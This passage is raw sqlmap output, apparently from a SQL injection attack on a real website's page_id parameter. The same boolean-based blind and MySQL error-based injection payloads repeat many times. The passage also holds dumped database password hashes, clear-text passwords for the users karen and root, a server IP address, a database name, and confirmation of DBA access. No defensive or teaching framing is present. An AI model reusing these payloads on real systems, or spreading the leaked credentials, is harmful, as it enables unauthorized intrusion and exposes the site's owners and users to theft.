  854.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  855.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  856. ---
  857.  
  858. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  859. ---
  860. Place: GET
  861. Parameter: page_id
  862.     TYPE: boolean-based blind
  863.     Title: AND boolean-based blind - WHERE OR HAVING clause
  864.     Payload: page_id=28167956 AND 1228=1228
  865.  
  866.     TYPE: error-based
  867.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  868.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  869. ---
  870.  
  871. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  872. ---
  873. Place: GET
  874. Parameter: page_id
  875.     TYPE: boolean-based blind
  876.     Title: AND boolean-based blind - WHERE OR HAVING clause
  877.     Payload: page_id=28167956 AND 1228=1228
  878.  
  879.     TYPE: error-based
  880.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  881.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  882. ---
  883.  
  884. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  885. ---
  886. Place: GET
  887. Parameter: page_id
  888.     TYPE: boolean-based blind
  889.     Title: AND boolean-based blind - WHERE OR HAVING clause
  890.     Payload: page_id=28167956 AND 1228=1228
  891.  
  892.     TYPE: error-based
  893.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  894.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  895. ---
  896.  
  897. DATABASE management system users password hashes:
  898. [*] karen [2]:
  899.     password hash: 1c00fc2b05570f2f
  900.     password hash: 248036c235f60aa8
  901. [*] nujeplies [1]:
  902.     password hash: NULL
  903. [*] root [5]:
  904.     password hash: 248036c235f60aa8
  905.     password hash: 248036c235f60aa8
  906.     password hash: 4fc67fc309a271b8
  907.     clear-text password: karen
  908.     clear-text password: karen
  909.     password hash: 4fc67fc309a271b8
  910.     clear-text password: karen
  911.     clear-text password: karen
  912.     password hash: NULL
  913. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  914. ---
  915. Place: GET
  916. Parameter: page_id
  917.     TYPE: boolean-based blind
  918.     Title: AND boolean-based blind - WHERE OR HAVING clause
  919.     Payload: page_id=28167956 AND 1228=1228
  920.  
  921.     TYPE: error-based
  922.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  923.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  924. ---
  925.  
  926. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  927. ---
  928. Place: GET
  929. Parameter: page_id
  930.     TYPE: boolean-based blind
  931.     Title: AND boolean-based blind - WHERE OR HAVING clause
  932.     Payload: page_id=28167956 AND 1228=1228
  933.  
  934.     TYPE: error-based
  935.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  936.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  937. ---
  938.  
  939. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  940. ---
  941. Place: GET
  942. Parameter: page_id
  943.     TYPE: boolean-based blind
  944.     Title: AND boolean-based blind - WHERE OR HAVING clause
  945.     Payload: page_id=28167956 AND 1228=1228
  946.  
  947.     TYPE: error-based
  948.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  949.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  950. ---
  951.  
  952. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  953. ---
  954. Place: GET
  955. Parameter: page_id
  956.     TYPE: boolean-based blind
  957.     Title: AND boolean-based blind - WHERE OR HAVING clause
  958.     Payload: page_id=28167956 AND 1228=1228
  959.  
  960.     TYPE: error-based
  961.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  962.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  963. ---
  964.  
  965. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  966. ---
  967. Place: GET
  968. Parameter: page_id
  969.     TYPE: boolean-based blind
  970.     Title: AND boolean-based blind - WHERE OR HAVING clause
  971.     Payload: page_id=28167956 AND 1228=1228
  972.  
  973.     TYPE: error-based
  974.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  975.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  976. ---
  977.  
  978. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  979. ---
  980. Place: GET
  981. Parameter: page_id
  982.     TYPE: boolean-based blind
  983.     Title: AND boolean-based blind - WHERE OR HAVING clause
  984.     Payload: page_id=28167956 AND 1228=1228
  985.  
  986.     TYPE: error-based
  987.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  988.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  989. ---
  990.  
  991. banner:    '5.0.45-log'
  992.  
  993. CURRENT USER:    'root@208.43.165.226'
  994.  
  995. CURRENT DATABASE:    'orcataco_bumperstic'
  996.  
  997. CURRENT USER IS DBA:    'True'